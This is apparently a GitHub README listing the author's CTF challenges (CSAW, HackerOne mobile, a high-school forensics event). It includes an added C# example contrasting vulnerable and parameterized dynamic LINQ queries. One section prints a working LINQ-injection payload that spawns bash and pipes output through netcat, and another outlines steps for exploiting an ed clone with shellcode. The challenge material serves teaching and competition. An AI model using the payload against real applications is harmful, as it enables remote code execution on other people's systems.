breadchris/ctf_challenges

ctf_challenges

CSAW CTF 2016 Finals

This was basically SQL injection in LINQ, which, unfortunately, gives you RCE.

"".GetType().Assembly.GetType("System.AppDomain").GetMethods()[18].Invoke("".GetType().Assembly.GetType("System.AppDomain").GetProperty("CurrentDomain").GetValue(null), "System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089;System.Diagnostics.Process".Split(";".ToCharArray())).GetType().GetMethods()[80].Invoke(null, "bash;-c 'ls | nc 0 9001'".Split(";".ToCharArray()))
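The root cause behind a payload like the one above, shown as an added example rather than code from this repository: user text is concatenated into an expression string that a dynamic LINQ parser then evaluates. It assumes a string-based parser such as the System.Linq.Dynamic.Core NuGet package; the `Product` type, the sample data and the method names are hypothetical.

```csharp
using System;
using System.Collections.Generic;
using System.Linq;
using System.Linq.Dynamic.Core; // assumed library: string-based LINQ predicates

public record Product(string Name, decimal Price);

public static class ProductSearch
{
    // Constructed sample data standing in for the challenge's data source.
    static readonly IQueryable<Product> Products = new[]
    {
        new Product("turtle", 5m),
        new Product("editor", 9m),
    }.AsQueryable();

    // Identifiers cannot be bound as parameters, so they are allowlisted instead.
    static readonly HashSet<string> SortableColumns =
        new(StringComparer.Ordinal) { "Name", "Price" };

    // Vulnerable: the input becomes part of the expression source, so any
    // operators, member accesses or method calls in it are parsed as code.
    public static List<Product> SearchUnsafe(string name) =>
        Products.Where("Name == \"" + name + "\"").ToList();

    // Hardened: the expression text is constant. The input is bound as @0 and
    // is only ever compared as a string value, never parsed.
    public static List<Product> SearchSafe(string name, string sortBy)
    {
        if (!SortableColumns.Contains(sortBy))
            throw new ArgumentException("unsupported sort column", nameof(sortBy));
        return Products.Where("Name == @0", name).OrderBy(sortBy).ToList();
    }

    public static void Main()
    {
        // Constructed probe: the quote closes the string literal, and the rest
        // is parsed as an extra clause: Name == "x" || "a" == "a"
        string probe = "x\" || \"a\" == \"a";
        Console.WriteLine($"unsafe matches: {SearchUnsafe(probe).Count}");
        Console.WriteLine($"safe matches:   {SearchSafe(probe, "Name").Count}");
    }
}
```

When reviewing code for this bug class, look for any string-predicate call whose first argument is built from request data, including sort and select clauses.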

A clone of ed, the standard editor, but without the easy !/bin/sh shellcode.

This challenge did not require any memory corruption. The goal of this challenge was to make people understand how to use ed, heh.

  1. Use ed commands to load the ed binary into ed and print it out
  2. Join two lines so that the length becomes out of sync
  3. Allocate some strings on the heap
  4. Since the program thinks the size of the line is really big (as a result of a lot of subtractions being done to the line length), we can search for all ASCII chars (0-255) using find and parse out the results to essentially leak the heap
  5. From the heap leak, you can pull the filename which was randomly generated
  6. Put payload file path on the heap
  7. Overflow the mark table until you can change the can_save and filename.
  8. Create a stripped down shared object with shellcode
  9. Now that we know the name of the file, we can write our payload to it and load it to execute our shellcode

ed.py

CSAW CTF 2018 Quals

Pretty straightforward ROP challenge with a slight twist of having to craft a fake obj-c dtable method lookup. You can check out the internals of obj-c for linux here.

turtles.py

HackerOne CTFs

A collection of CTFs that I made for HackerOne which are mobile focused, with a bit of web.

  • h1-702-2017 - iOS (5 challenges) and Android (5 challenges) crackmes with incremental difficulty
  • h1-202-2018 - A single app which calls into server components. I really liked making this one a lot since you had to progress through the challenge to solve it all. It was also my first time using Retrofit and I really wish I knew about it earlier lol
  • h1-702-2018 - Five Android challenges: 3 crackmes and 2 pwnables (object deserialization and memory corruption). It was really cool to have pwnable challenges for mobile, but operations-wise it was a complete failure. I plan on making this a lot better for the next time.

h1-ctf-archives

MCPS HSFs

A CTF that I put on annually for a school county for high schoolers. It is a mock digital forensics investigation which has flags, but is not a Jeopardy-style CTF. You have to make your way through the evidence and write a report on your findings. Based on the flags that the teams found, you can do an initial filtering of all the competitors and identify the top finishers. Then, you will read through their reports and identify the teams which successfully solved the crime and found the most incriminating evidence. I started running this when the high school event I used to run, CSAW HSF, unfortunately became a mind-numbing Jeopardy-style CTF. I love this format and have plans to operationalize it so that schools across the world can run their own version of it.

About

ctfs I have run and challenges I have made
